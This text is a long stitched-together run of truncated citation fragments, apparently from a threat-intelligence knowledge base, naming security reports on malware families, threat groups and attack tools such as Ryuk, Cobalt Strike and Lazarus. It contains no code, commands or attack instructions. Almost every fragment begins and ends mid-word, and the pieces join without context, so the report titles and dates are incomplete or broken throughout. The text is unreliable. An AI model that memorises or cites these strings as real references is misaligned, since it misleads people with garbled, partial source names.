Okta Block Anonymizing Services),(Citation: Microsoft Common Conditional Access Policies),(Citation: NIST 800-63-3)
ation: Korean FSI TA505 2020),(Citation: FireEye APT38 Oct 2018),(Citation: Talos Konni May 2017),(Citation: Kaspersky Ferocious Kitten Ju

earSky Pay2Kitten December 2020),(Citation: US-CERT TA18-074A),(Citation: DomainTools WinterVivern 2021),(Citation: HP RaspberryRobi

nit 42 OutSteel SaintBot February 2022 ),(Citation: Awake Security Avaddon),(Citation: TrendMicro Cobalt Group Nov 2017),(Citation: Mal

Citation: Kaspersky Cloud Atlas December 2014),(Citation: Kaspersky MoleRATs April 2019),(Citation: Unit 42 QUADAGENT July 2018),(Cita
Strike Daddy May 2017),(Citation: CISA AA20-301A Kimsuky),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: 360 Machete S
23),(Citation: Intezer Doki July 20),(Citation: Carbon Black Shlayer Feb 2019),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: NCSC
tion: Kaspersky Transparent Tribe August 2020),(Citation: Unit 42 OilRig Sept 2018),(Citation: Talos Kimsuky Nov 2021),(Citation: Cisco Ope
Citation: Zscaler APT31 Covid-19 October 2020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: MalwareBytes WoodyRAT Aug 2
December 2020),(Citation: Unit 42 C0d0so0 Jan 2016),(Citation: Talos Promethium June 2020),(Citation: McAfee Honeybee),(Citation: Nc
023),(Citation: Segurança Informática URSA Sophisticated Loader 2020),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: ESET

efender Agent Tesla April 2020),(Citation: Securelist BlackEnergy Nov 2014),(Citation: Cisco H1N1 Part 2),(Citation: ESET Machete July 2019

cidRain JAGS 2022),(Citation: Volexity PowerDuke November 2016),(Citation: ESET Hermetic Wizard March 2022),(Citation: Picus Sodinoki

2018),(Citation: Unit 42 C0d0so0 Jan 2016),(Citation: ESET Turla Lunar toolset May 2024),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citati
CarbonBlack RobbinHood May 2019),(Citation: Intel 471 REvil March 2020),(Citation: Talos Nyetya June 2017),(Citation: BlackBerry Black B

ET Zebrocy Nov 2018),(Citation: Secureworks BRONZE SILHOUETTE May 2023),(Citation: Mandiant FIN12 Oct 2021),(Citation: ESET Gelsemi

nuary 2021),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: ClearSky Lazarus Aug 2020),(Citation: Secure

Palo Alto Rover),

y Advisory AA23-129A Snake Malware May 2023),(Citation: Trend Micro Skidmap),(Citation: Lab52 WIRTE Apr 2019),(Citation: Arxiv Avadd

arch 2024),(Citation: Trend Micro Ransomware Spotlight Play July 2023),(Citation: McAfee Lazarus Nov 2020),(Citation: Mandiant UNC389

),(Citation: Crowdstrike DriveSlayer February 2022),(Citation: Palo Alto Shamoon Nov 2016),(Citation: Mandiant ROADSWEEP August 2022
2019),(Citation: Red Canary Hospital Thwarted Ryuk October 2020),(Citation: DFIR Ryuk's Return October 2020),(Citation: FireEye Ryuk and

pr 2019),(Citation: Securelist ScarCruft Jun 2016),(Citation: Securelist LuckyMouse June 2018),(Citation: Google TAG Lazarus Jan 2021),(Cit

n: Akamai DGA Mitigation)

Trooper Mar 2018),(Citation: Mythc Documentation),(Citation: IBM Grandoreiro April 2020),(Citation: Zscaler Bazar September 2020),(Cita
k HotCroissant April 2020),(Citation: Palo Alto menuPass Feb 2017),(Citation: PWC WellMess C2 August 2020),(Citation: McAfee GhostSec
Trend Micro FIN6 October 2019),(Citation: Check Point APT35 CharmPower January 2022),(Citation: Talos PoetRAT April 2020),(Citation: E
),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: Kaspersky WIRTE November 2021),(Citation: Talos Promet

Tempest Operations October 2023),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: Volexity InkySquid RokRAT August 2021),

tation: KISA Operation Muzabi),(Citation: Cisco Talos Avos Jun 2022),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: CISA AA20-25
us APT Feb 2018),(Citation: Securelist Dropping Elephant),(Citation: F-Secure The Dukes),(Citation: iSight Sandworm Oct 2014),(Citation: Fi

ture February 2024),(Citation: Novetta-Axiom),(Citation: IBM ZeroCleare Wiper December 2019),(Citation: Check Point APT31 February 20
rike Carbon Spider August 2021),(Citation: DFIR Ryuk's Return October 2020),(Citation: Kaspersky Flame),(Citation: Nicolas Falliere, Liam O
CrowdStrike StellarParticle January 2022),(Citation: BlackBerry CostaRicto November 2020),(Citation: Mandiant FIN13 Aug 2022),(Citation
ation: Novetta Blockbuster RATs),(Citation: Symantec Linfo May 2012),(Citation: Novetta Blockbuster),(Citation: Mandiant APT29 Eye Spy E
ndCrab and REvil September 2019),(Citation: Microsoft Actinium February 2022),(Citation: ESET Gelsemium June 2021),(Citation: Joint Cyb
Citation: Unit 42 Rocke January 2019),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: ESET LoudMiner June 2019),(Citation:

(Citation: McAfee Cuba April 2021),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Unit 42 DarkHydrus July 2018),(Citation: Unit

Nov 2020),(Citation: Symantec Whitefly March 2019),(Citation: Securelist BlackOasis Oct 2017),(Citation: Proofpoint TA416 Europe March
PTSecurity Higaisa 2020),(Citation: HP RaspberryRobin 2024),(Citation: Lunghi Iron Tiger Linux),(Citation: Trellix Darkgate 2023),(Citation:
Miner Jan 2019),(Citation: DFIR Phosphorus November 2021),(Citation: Talos Rocke August 2018),(Citation: Malwarebytes DarkComet Mar
Citation: CarbonBlack RobbinHood May 2019),(Citation: Cisco H1N1 Part 2),(Citation: Cybereason Cobalt Kitty 2017),(Citation: ATT TeamTN

21),(Citation: Unit42 Agrius 2023),(Citation: Microsoft NICKEL December 2021),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien Febru

ub Pupy),(Citation: SentinelOne Agrius 2021),(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: Microsoft FinF
usPete Aug 2020),(Citation: FireEye FIN10 June 2017),(Citation: Mandiant Cutting Edge Part 2 January 2024),(Citation: Sandfly BPFDoor 20

ireEye TRITON 2019),(Citation: Unit 42 PingPull Jun 2022),(Citation: Lee 2013),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: cobal

tion: Secureworks Gold Prelude Profile),(Citation: Unit42 BabyShark Apr 2019),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Talos Fran
Cry),(Citation: SecureWorks WannaCry Analysis),(Citation: Cybereason Royal December 2022),(Citation: Cyble Black Basta May 2022),(Citati

t Stolen Pencil Dec 2018),(Citation: McAfee Netwire Mar 2015),(Citation: Korean FSI TA505 2020),(Citation: Talos Konni May 2017),(Citatio

tation: BleepingComputer DDE Disabled in Word Dec 2017),(Citation: Microsoft Protected View)
s 2023),(Citation: DFIR Conti Bazar Nov 2021),(Citation: DFIR Phosphorus November 2021),(Citation: Microsoft About BITS),(Citation: ESET

July 2021),(Citation: Prevailion DarkWatchman 2021),(Citation: NTT Security Flagpro new December 2021),(Citation: CrowdStrike StellarPa

129A Snake Malware May 2023),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: CISA AA20-259A Iran-Based Actor September 202
aspersky Transparent Tribe August 2020),(Citation: CrowdStrike StellarParticle January 2022),(Citation: FOX-IT May 2016 Mofang),(Citation

),(Citation: Palo Alto Networks Black Basta August 2022),(Citation: IBM MegaCortex),(Citation: Red Canary NETWIRE January 2020),(Citatio

20),(Citation: Fortinet Diavol July 2021),(Citation: Segurança Informática URSA Sophisticated Loader 2020),(Citation: FOX-IT May 2016 Mof

(Citation: Invincea XTunnel),(Citation: Unit42 Xbash Sept 2018),(Citation: Unit42 Agrius 2023),(Citation: Talos Rocke August 2018),(Citation
T 41 June 2021),(Citation: Elastic Latrodectus May 2024),(Citation: Microsoft Actinium February 2022),(Citation: Securelist DarkVishnya De

),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: Kaspersky ToddyCat Check Logs October 2023),(C
,(Citation: FoxIT Wocao December 2019),(Citation: Unit 42 PingPull Jun 2022),(Citation: Binary Defense Emotes Wi-Fi Spreader),(Citation:

2017),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: Dell TG-3390),(Citation: Tilbury Windows Credentials)
n Cobalt Kitty 2017),(Citation: ESET Bad Rabbit),(Citation: Cylance Cleaver),(Citation: Rapid7 HAFNIUM Mar 2021),(Citation: Talos Olympic
CKEL December 2021),(Citation: Cary Esentutl),(Citation: Github Koadic),(Citation: Microsoft Volt Typhoon May 2023),(Citation: Symantec

2015),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: GitHub Mimikatz lsadump Module),(Citation: NCSC Joint Report Public Tools),(Cit
lRig Sept 2018),(Citation: Symantec Frutas Feb 2013),(Citation: Fortinet Diavol July 2021),(Citation: FOX-IT May 2016 Mofang),(Citation: Se
),(Citation: FinFisher Citation),(Citation: NCC Group WastedLocker June 2020),(Citation: Microsoft FinFisher March 2018),(Citation: TrendM
A Iran-Based Actor September 2020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Cyber Forensicator Silence Jan 2019),(Citati

tion: Medium Metamorfo Apr 2020),(Citation: Mandiant APT1 Appendix),(Citation: Mandiant Cutting Edge Part 2 January 2024),(Citation:
owPad Aug 2017),(Citation: Profero APT27 December 2020),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Red Canary NETWIRE Ja

21),(Citation: Mandiant APT41),(Citation: Cybereason Soft Cell June 2019),(Citation: ESET Machete July 2019),(Citation: ZScaler Squirrelwaffl

DICKENS September 2019),(Citation: FireEye APT41 Aug 2019),(Citation: group-ib_muddywater_infra),(Citation: Cybereason INC Ransomw

ust 2020),(Citation: ESET Sednit USBStealer 2014),(Citation: ESET Sednit Part 2),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: CIS
ber 2020),(Citation: FireEye Ryuk and Trickbot January 2019),(Citation: Palo Alto OilRig May 2016),(Citation: DFIR Conti Bazar Nov 2021),(C
: ClearSky Lebanese Cedar Jan 2021),(Citation: FireEye APT34 Dec 2017),(Citation: FireEye admin@338),(Citation: Unit 42 Playbook Dec 20

t 2018),(Citation: Certfa Charming Kitten January 2021),(Citation: Microsoft Iranian Threat Actor Trends November 2021),(Citation: Proofpo

zarus Aug 2020),(Citation: Group IB RTM August 2019),(Citation: Trend Micro TA505 June 2019),(Citation: Visa FIN6 Feb 2019),(Citation: Pr
nt No Easy Breach),(Citation: Cylance Dust Storm),(Citation: Latrodectus APR 2024),(Citation: McAfee Dianxun March 2021),(Citation: Proof

b 2021),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: BlackBerry CostaRicto November 2020),(Citation: CarbonBlack Conti July 2020
Citation: TrendMicro Lazarus Nov 2018),(Citation: Securelist WhiteBear Aug 2017),(Citation: Trend Micro Qakbot May 2020),(Citation: SCIL

2021),(Citation: ESET PipeMon May 2020),(Citation: Symantec Dyre June 2015),(Citation: Eset Ramsay May 2020),(Citation: Joint Cybersec

17),(Citation: Malwarebytes SmokeLoader 2016),(Citation: Microsoft Dofoil 2018),(Citation: Profero APT27 December 2020),(Citation: Secu

nual),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: BlackBerry CostaRicto November 2020),(Citation: Cobalt Str
Checkpoint Dridex Jan 2021),(Citation: Volexity Patchwork June 2018),(Citation: Symantec Vasport May 2012),(Citation: Dell Dridex Oct 20

020),(Citation: ESET InvisiMole June 2018),(Citation: University of Birmingham C2)

uary 2011),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: Microsoft Volt Typhoon May 2023),(Citation: ESET InvisiMole June 2018
: CISA AA21-200A APT40 July 2021),(Citation: ProofPoint Ursnif Aug 2016),(Citation: ESET Kobalos Jan 2021),(Citation: ESET GreyEnergy Oc
lorigate January 2021),(Citation: US-CERT Bankshot Dec 2017),(Citation: ESET Gelsemium June 2021),(Citation: TrendMicro BKDR_URSNIF.

7),(Citation: Cisco Talos Avos Jun 2022),(Citation: Mandiant FIN7 Apr 2022),(Citation: Symantec Thrip June 2018),(Citation: Bitdefender Tri
20),(Citation: RedCanary Mockingbird May 2020),(Citation: Group IB Silence Sept 2018),(Citation: DHS/CISA Ransomware Targeting Health
n January 2024),(Citation: Dell TG-1314),(Citation: RedCanary Mockingbird May 2020),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation

reason Bumblebee August 2022),(Citation: Debian nbtscan Nov 2019),(Citation: Secureworks BRONZE SILHOUETTE May 2023),(Citation: Se
tation: Bitdefender LuminousMoth July 2021),(Citation: Microsoft Disable Autorun),(Citation: win10_asr),(Citation: TechNet Removable M

evx Carberp March 2011),(Citation: FireEye Hikit Rootkit),(Citation: Kaspersky Turla),

August 2021),(Citation: Cybereason Oceanlotus May 2017),(Citation: Mandiant No Easy Breach),(Citation: CISA SoreFang July 2016),(Citatio

ter Oct 2018),(Citation: Kaspersky Flame),(Citation: Red Canary NETWIRE January 2020),(Citation: Riskiq Remcos Jan 2018),(Citation: Cylan
n OperationCuckooBees May 2022),(Citation: Tarrask scheduled task),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 202

tion: CarbonBlack Conti July 2020),(Citation: McAfee Cuba April 2021),(Citation: DFIR Ryuk's Return October 2020),(Citation: IBM MegaCor

2022),(Citation: Sekoia Raccoon2 2022),(Citation: Kaspersky ToddyCat June 2022),(Citation: Carbon Black HotCroissant April 2020),(Citatio
020),(Citation: Palo Alto Comnie),(Citation: ESET Turla Lunar toolset May 2024),(Citation: ESET ComRAT May 2020),(Citation: SCILabs Malte

Korean FSI TA505 2020),(Citation: mandiant_apt44_unearthing_sandworm),(Citation: McAfee Sharpshooter December 2018),(Citation: Ci

ePanda 2024),(Citation: CISA AppleJeus Feb 2021),(Citation: Symantec Nerex May 2012),(Citation: ESET PipeMon May 2020),(Citation: Vole
M Mar 2021),(Citation: Github Covenant),(Citation: Github Koadic),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: Unit 42 TA551 Ja
nar May 2020),(Citation: Fortinet Metamorfo Feb 2020),(Citation: Microsoft AlwaysInstallElevated 2018)

Citation: Proofpoint Leviathan Oct 2017),(Citation: Morphisec Cobalt Gang Oct 2018),(Citation: ThreatGeek Derusbi Converge),(Citation: ES
Netskope Squirrelwaffle Oct 2021),(Citation: Mandiant APT41),(Citation: Cybereason Egregor Nov 2020),(Citation: TrendMicro Pikabot 20

o 2021 netlab360 analysis),(Citation: Symantec Tortoiseshell 2019),(Citation: Proofpoint TA505 October 2019),(Citation: ESET Zebrocy Nov

July 2018),(Citation: CrowdStrike Ryuk January 2019),(Citation: Symantec Dragonfly),(Citation: Talos Manjusaka 2022),(Citation: Proofpoin

ft Cell June 2019),(Citation: ESET Machete July 2019),(Citation: ESET ComRAT May 2020),(Citation: Cybereason Cobalt Kitty 2017),(Citation:
,(Citation: Kaspersky Transparent Tribe August 2020),(Citation: Securelist Denis April 2017),(Citation: Fortinet Diavol July 2021),(Citation: F

y 2022),(Citation: Cisco Talos Intelligence Group),(Citation: F-Secure The Dukes),(Citation: Symantec Hydraq Jan 2010),(Citation: Bitdefend

ngbird May 2020),(Citation: Group IB Silence Sept 2018),(Citation: BitDefender Chafer May 2020),(Citation: FoxIT Wocao December 2019)

on: DigiTrust Agent Tesla Jan 2017),(Citation: ESET PipeMon May 2020),(Citation: Microsoft Analyzing Solorigate Dec 2020),(Citation: Preva

165),(Citation: Netscout Stolen Pencil Dec 2018),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: GitHub Pupy),(Cit
n: Recorded Future REDDELTA July 2020),(Citation: ClearSky Lazarus Aug 2020),(Citation: Group IB RTM August 2019),(Citation: Trend Micr

Storm),(Citation: Latrodectus APR 2024),(Citation: McAfee Dianxun March 2021),(Citation: Proofpoint TA450 Phishing March 2024),(Citati
Oct 2021),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: IBM ZeroCleare Wiper December 2019),(Citation: Syma

reEye Shamoon Nov 2016),(Citation: DFIR Phosphorus November 2021),(Citation: ANSSI RYUK RANSOMWARE),(Citation: Unit42 Agrius 20

November 2020),(Citation: Unit 42 Kazuar May 2017),(Citation: jRAT Symantec Aug 2018),(Citation: Kaspersky Transparent Tribe August 20

e January 2022),(Citation: Unit42 DarkHydrus Jan 2019),(Citation: Lastline DarkHotel Just In Time Decryption Nov 2015),(Citation: ClearSky
QakBot September 2021),(Citation: Kaspersky Tomiris Sep 2021),(Citation: Joe Sec Trickbot),(Citation: SentinelOne Agrius 2021),(Citation: S

SET EvasivePanda 2024),(Citation: FireEye FIN6 Apr 2019),(Citation: Kaspersky Cloud Atlas December 2014),(Citation: FireEye Shining A Ligh
2),(Citation: Unit 42 Kazuar May 2017),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: Proofpoint Leviathan Oct 2017),(Ci

Breach),(Citation: FireEye APT41 Aug 2019),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: Cybereason IN
ne UAC Bypass November 2020),(Citation: Microsoft BlackCat Jun 2022),(Citation: FOX-IT May 2016 Mofang),(Citation: Nccgroup Emissary

ation: Cybereason OperationCuckooBees May 2022),(Citation: Kaspersky ToddyCat Check Logs October 2023),(Citation: DFIR_Quantum_Ra

2019),(Citation: Unit 42 Kazuar May 2017),(Citation: GitHub PoshC2),(Citation: Rostovcev APT41 2021),(Citation: Sekoia Raccoon2 2022),(

ed Future REDDELTA July 2020),(Citation: Unit 42 Gamaredon February 2022),(Citation: TrendMicro EarthLusca 2022),(Citation: DOJ Iran I
Part 2 January 2024),(Citation: Zscaler Lyceum DnsSystem June 2022),(Citation: BitDefender Chafer May 2020),(Citation: Joint Cybersecurit

Citation: Unit 42 BadPatch Oct 2017),

-129A Snake Malware May 2023),(Citation: Unit 42 Kazuar May 2017),(Citation: Lab52 WIRTE Apr 2019),(Citation: Volexity OceanLotus Nov
),(Citation: CheckPoint Naikon May 2020),(Citation: ESET InvisiMole June 2020),(Citation: Fortinet Metamorfo Feb 2020),(Citation: ESET In
coon2 2022),(Citation: Symantec Tick Apr 2016),(Citation: Novetta Blockbuster RATs),(Citation: DOJ GRU Indictment Jul 2018),(Citation: KIS
on: McAfee Sharpshooter December 2018),(Citation: Unit42 OceanLotus 2017),(Citation: SentinelOne FrameworkPOS September 2019),(C

2023),(Citation: Secureworks GOLD IONIC April 2024),(Citation: Mandiant FIN12 Oct 2021),(Citation: Mandiant Suspected Turla Campaign
18),(Citation: Palo Alto T9000 Feb 2016),(Citation: Kaspersky Adwind Feb 2016),(Citation: Malwarebytes DarkComet March 2018),(Citation
cao December 2019),(Citation: Kaspersky ToddyCat Check Logs October 2023),(Citation: Radware Micropsia July 2018),(Citation: Bitdefend

2014),(Citation: Kaspersky MoleRATs April 2019),(Citation: CrowdStrike Ryuk January 2019),(Citation: Proofpoint TA2541 February 2022),(C

ation: UCF STIG Symbolic Links)

: Kaspersky Ferocious Kitten Jun 2021),(Citation: Fortinet Agent Tesla April 2018),(Citation: Palo Alto OilRig May 2016),(Citation: objsee ma

1),(Citation: HP RaspberryRobin 2024),(Citation: CheckPoint SpeakUp Feb 2019),(Citation: Unit 42 OopsIE! Feb 2018),(Citation: Volexity Ink

roup Nov 2017),(Citation: Malwarebytes Konni Aug 2021),(Citation: Palo Alto Latrodectus Activity June 2024),(Citation: Trend Micro Black

2 QUADAGENT July 2018),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: MuddyWater TrendMicro June
020),(Citation: 360 Machete Sep 2020),(Citation: US-CERT TA18-074A),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: Talos Co
macy Jun 2021),(Citation: NCSC-NL COATHANGER Feb 2024),(Citation: ObjectiveSee AppleJeus 2019),(Citation: Chaos Stolen Backdoor),(Cita
Nov 2021),(Citation: Cisco Operation Layover September 2021),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: Cybereason O
alwareBytes WoodyRAT Aug 2022),(Citation: Unit42 Agrius 2023),(Citation: Check Point Meteor Aug 2021),(Citation: Proofpoint TA505 Jan
cAfee Honeybee),(Citation: Nccgroup Gh0st April 2018),(Citation: Microsoft Wingbird Nov 2017),(Citation: Lotus Blossom Jun 2015),(Citatio
ovember 2020),(Citation: ESET Security Mispadu Facebook Ads 2019),(Citation: GitHub Pupy),(Citation: Directory Services Internals DPAPI

ation: ESET Machete July 2019),(Citation: FireEye APT35 2018),(Citation: SCILabs Malteiro 2021),(Citation: IBM Grandoreiro April 2020),(Ci

2022),(Citation: Picus Sodinokibi January 2020),(Citation: Fortinet Diavol July 2021),(Citation: Novetta Blockbuster),(Citation: Symantec Sha

Squirrelwaffle Sep 2021),(Citation: Lotus Blossom Jun 2015),(Citation: Cybereason Cobalt Kitty 2017),(Citation: RotaJakiro 2021 netlab360
),(Citation: BlackBerry Black Basta May 2022),(Citation: Sogeti CERT ESEC Babuk March 2021),(Citation: Secureworks GOLD IONIC April 202

2021),(Citation: ESET Gelsemium June 2021),(Citation: Mandiant Suspected Turla Campaign February 2023),(Citation: Kaspersky ToddyCa

us Aug 2020),(Citation: Securelist Kimsuky Sept 2013),(Citation: FireEye APT30),(Citation: DOJ GRU Indictment Jul 2018),(Citation: Mandian
r 2019),(Citation: Arxiv Avaddon Feb 2021),(Citation: BlackBerry CostaRicto November 2020),(Citation: Talos PoetRAT October 2020),(Cita

0),(Citation: Mandiant UNC3890 Aug 2022),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: SentinelOne Aoqin Dragon June 2022),

ant ROADSWEEP August 2022),(Citation: Symantec Ukraine Wipers February 2022),(Citation: Qualys Hermetic Wiper March 2022),(Citatio
20),(Citation: FireEye Ryuk and Trickbot January 2019),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Symantec Bumblebee June 2022),(C

gle TAG Lazarus Jan 2021),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: TrendMicro EarthLusca 2022),(Citation: Symant

r Bazar September 2020),(Citation: GitHub Sliver Encryption),(Citation: ESET Zebrocy Nov 2018),(Citation: SecureWorks WannaCry Analysi
0),(Citation: McAfee GhostSecret),(Citation: Novetta Winnti April 2015),(Citation: Red Canary NETWIRE January 2020),(Citation: Unit42 Ben
oetRAT April 2020),(Citation: ESET Carbon Mar 2017),(Citation: DFIR Ryuk 2 Hour Speed Run November 2020),(Citation: Linux FTP),(Citatio
r 2021),(Citation: Talos Promethium June 2020),(Citation: McAfee Honeybee),(Citation: Unit42 Cannon Nov 2018),(Citation: ESET Industroy

kySquid RokRAT August 2021),(Citation: DFIR Conti Bazar Nov 2021),(Citation: FireEye APT29),(Citation: Symantec Waterbug Jun 2019),(Cit

2021),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: FireEye APT41 March 2020),(Citation: US District Court Indic
dworm Oct 2014),(Citation: FireEye Clandestine Fox),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: Symantec Tick Apr 20

heck Point APT31 February 2021),(Citation: CrowdStrike Scattered Spider BYOVD January 2023),(Citation: Nicolas Falliere, Liam O Murchu,
tation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: CISA AA20-296A Berserk Bear December 2020),(Citation: Secu
ant FIN13 Aug 2022),(Citation: CISA AA20-301A Kimsuky),(Citation: Trend Micro Ransomware Spotlight Play July 2023),(Citation: Intezer D
on: Mandiant APT29 Eye Spy Email Nov 22),(Citation: ESET Sednit Part 2),(Citation: FOX-IT May 2016 Mofang),(Citation: Malwarebytes Kim
June 2021),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: Unit 42 Kazuar May 2017),(Citation: Tr
udMiner June 2019),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Mandiant FIN13 Aug 2022),(Citation: ESET OceanLotus macOS A

ydrus July 2018),(Citation: Unit 42 Inception November 2018),(Citation: Bromium Ursnif Mar 2017),(Citation: Unit 42 Magic Hound Feb 201

oofpoint TA416 Europe March 2022),(Citation: FireEye Hikit Rootkit),(Citation: PWC Cloud Hopper April 2017),(Citation: ESET InvisiMole Jun
ellix Darkgate 2023),(Citation: Dell TG-3390),(Citation: Bitdefender Naikon April 2021),(Citation: Palo Alto PlugX June 2017),(Citation: Bitde
Malwarebytes DarkComet March 2018),(Citation: TechNet Netsh Firewall),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: T
y 2017),(Citation: ATT TeamTNT Chimaera September 2020),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Cylance Cle

m O Murchu, Eric Chien February 2011),(Citation: Crowdstrike DriveSlayer February 2022),(Citation: FireEye SUNBURST Backdoor Decemb

2024),(Citation: Microsoft FinFisher March 2018),(Citation: Wevtutil Microsoft Documentation),(Citation: FireEye APT41 Aug 2019),(Citatio
,(Citation: Sandfly BPFDoor 2022),(Citation: ANSSI Sandworm January 2021),(Citation: Trend Micro IXESHE 2012),(Citation: Microsoft PLAT

AN Aug 2020),(Citation: cobaltstrike manual),(Citation: Kaspersky ToddyCat June 2022),(Citation: Crowdstrike DNC June 2016),(Citation: M

itty 2017),(Citation: Talos Frankenstein June 2019),(Citation: Proofpoint TA505 October 2019),(Citation: IBM Grandoreiro April 2020),(Cita
e Black Basta May 2022),(Citation: CrowdStrike Ryuk January 2019),(Citation: Minerva Labs Black Basta May 2022),(Citation: Hornet Securi

Talos Konni May 2017),(Citation: PowerSploit Documentation),(Citation: Talos ROKRAT),(Citation: Red Canary NETWIRE January 2020),(Cita
oft About BITS),(Citation: ESET Turla PowerShell May 2019),(Citation: Cadet Blizzard emerges as novel threat actor),(Citation: Unit42 Locke

Citation: CrowdStrike StellarParticle January 2022),(Citation: Talos Bisonal Mar 2020),(Citation: Lumen KVBotnet 2023),(Citation: Mandiant

n-Based Actor September 2020),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: Kroll RawPOS Jan 2017),(Citation: ClearSky Mud
T May 2016 Mofang),(Citation: Kaspersky Poseidon Group),(Citation: Talos Konni May 2017),(Citation: CrowdStrike Carbon Spider August

NETWIRE January 2020),(Citation: Talos TinyTurla September 2021),(Citation: Unit 42 Valak July 2020),(Citation: Riskiq Remcos Jan 2018),(C

itation: FOX-IT May 2016 Mofang),(Citation: Secureworks DarkTortilla Aug 2022),(Citation: BiZone Lizar May 2021),(Citation: Korean FSI TA

s Rocke August 2018),(Citation: Gigamon Berserk Bear October 2021),(Citation: Github Koadic),(Citation: Antiy CERT Ramsay April 2020),(C
on: Securelist DarkVishnya Dec 2018),(Citation: Github PowerShell Empire),(Citation: Bitdefender Sardonic Aug 2021),(Citation: Mandiant

t Check Logs October 2023),(Citation: BlackBerry CostaRicto November 2020),(Citation: Talos Bisonal Mar 2020),(Citation: Mandiant APT2
tes Wi-Fi Spreader),(Citation: US-CERT BADCALL),(Citation: Novetta Blockbuster RATs),(Citation: Talos GravityRAT),(Citation: Novetta Block

2021),(Citation: Talos Olympic Destroyer 2018),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: Unit42 OilRig Playbook
May 2023),(Citation: Symantec Cicada November 2020),(Citation: Metcalf 2015)

Joint Report Public Tools),(Citation: Mandiant Pulse Secure Update May 2021),(Citation: Unit42 Agrius 2023),(Citation: Cadet Blizzard eme
ay 2016 Mofang),(Citation: Secureworks DarkTortilla Aug 2022),(Citation: Talos Kimsuky Nov 2021),(Citation: Infoblox Lokibot January 201
March 2018),(Citation: TrendMicro Patchwork Dec 2017),(Citation: ESET OceanLotus),(Citation: TrendMicro POWERSTATS V3 June 2019),(C
cator Silence Jan 2019),(Citation: ClearSky MuddyWater Nov 2018),(Citation: Unit 42 DarkHydrus July 2018),(Citation: Cylance Machete M

art 2 January 2024),(Citation: ANSSI Sandworm January 2021),(Citation: Kaspersky Cloud Atlas December 2014),(Citation: Intezer HiddenW
ation: Red Canary NETWIRE January 2020),(Citation: Cybereason Chaes Nov 2020),(Citation: Talos TinyTurla September 2021),(Citation: Se

,(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Sogeti CERT ESEC Babuk Mar

on: Cybereason INC Ransomware November 2023),(Citation: Microsoft Volt Typhoon May 2023),(Citation: Huntress INC Ransomware May

omacy Jun 2021),(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: Microsoft SIR Vol 19),(Citation: Proofpoint
DFIR Conti Bazar Nov 2021),(Citation: Symantec Bumblebee June 2022),(Citation: Secureworks REvil September 2019),(Citation: CISA Sore
ation: Unit 42 Playbook Dec 2017),

ember 2021),(Citation: Proofpoint TA453 July2021),(Citation: Secureworks COBALT DICKENS September 2019),(Citation: PWC Yellow Liderc

sa FIN6 Feb 2019),(Citation: Proofpoint Leviathan Oct 2017),(Citation: Trend Micro Qakbot December 2020),(Citation: Securelist Kimsuky S
n March 2021),(Citation: Proofpoint TA450 Phishing March 2024),(Citation: Talos Transparent Tribe May 2021),(Citation: Trend Micro Qakb

n: CarbonBlack Conti July 2020),(Citation: MalwareBytes WoodyRAT Aug 2022),(Citation: SentinelLabs reversing run-only applescripts 202
kbot May 2020),(Citation: SCILabs Malteiro 2021),(Citation: Cybereason Cobalt Kitty 2017),(Citation: SentinelLabs Agent Tesla Aug 2020),(C

2020),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: DHS/CISA Ransomware Targeting Healthcar

ecember 2020),(Citation: Securelist Dtrack),(Citation: Nccgroup Emissary Panda May 2018),(Citation: Talos Kimsuky Nov 2021),(Citation: C

ber 2020),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Kaspersky QakBot September 2021),(Citation: CISA AA20-259A Ira
